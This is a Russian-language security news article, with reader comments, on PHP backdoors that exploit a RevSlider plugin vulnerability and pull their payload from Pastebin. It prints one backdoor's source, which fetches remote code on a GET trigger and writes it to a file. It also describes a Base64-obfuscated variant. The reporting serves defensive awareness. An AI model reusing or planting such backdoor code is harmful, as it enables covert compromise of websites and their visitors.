Специалист по безопасности Денис Синегубко из компании Sucuri рассказывает о нескольких бэкдорах, которые используют известный сервис Pastebin для размещения своего кода. В момент заражения код скачивается, сохраняется в файл на компьютере жертвы и запускается на исполнение.

Бэкдоры в показанных примерах используют уязвимость в плагине RevSlider, и во всех остальных отношениях являются типичными представителями своего вида. Например, вот исходный код одного из них.

if(array_keys($_GET)[0] == 'up'){
$content = file_get_contents("http://pastebin . com/raw.php?i=JK5r7NyS");
if($content){unlink('evex.php');
$fh2 = fopen("evex.php", 'a');
fwrite($fh2,$content);
fclose($fh2);
}}else{print "test";}

Собственно, Pastebin предназначен как раз для этого: хостинга исходников. Сайт разрешает скачивать каждый фрагмент исходного кода в «сыром» формате (raw.php в вышеприведённом листинге), то есть без элементов интерфейса сайта.

Есть и пример более искусного бэкдора, который использует Pastebin.

003

Переменная $temp закодирована в Base64, а после раскодирования тоже показывает ссылку на Pastebin.

004

Интересно, что существует даже специальный обфускатор, который предусматривает хостинг кода обфусцированной программы на Pastebin. Кодировщик называется FathurFreakz (альтернативное название: PHP Encryptor by Yogyakarta Black Hat).

7 комментариев

  1. 09.01.2015 at 16:45

    91.212.89.150:7777 вирус перидай

  2. 11.01.2015 at 07:38

    О господи ну и что тут такого что бэкдор обновляет свой исходник с pastebin. Вот когда вирусы научатся сами себя дописывать ища код на форумах то вот тогда это будет реально страшно ))

    • 11.01.2015 at 20:34

      То, что пишут на форумах, порой заставить работать не может даже автор. 🙂

    • 11.01.2015 at 23:01

      Сами себя не смогут. Тем более с форумов. С гитхаба или тому подобное еще куда ни шло. Сразу же возникают заморочки с синтаксическим анализатором кода из репозиториев. Не все придерживаются определенных правил написания кода. Даже в одних и тех же языках программирования стилистика может быть разной (CamelCase, венгерская нотация в именовании переменных), да еще и не все дают человекопонятные относительно названия переменным и функциям. И комментирование кода у 90 процентов пользователей тоже на высоте. Обычным вирусописакам на дельфях такие заморочи ни к чему.

      • 11.01.2015 at 23:03

        Ой а еще путаница в версиях языков погромирования. Ждать будем долго предолго таких вирусов. С зачатками искусственного интеллекта.

      • 12.01.2015 at 11:50

        Не, вот выйдут из новогоднего запоя гуру, да как начнут Метасплоит к червякам прикручивать… 🙂

      • ScorpioT1000

        16.12.2015 at 13:18

        интереснее если например будет bower юзать для само-улучшения

Оставить мнение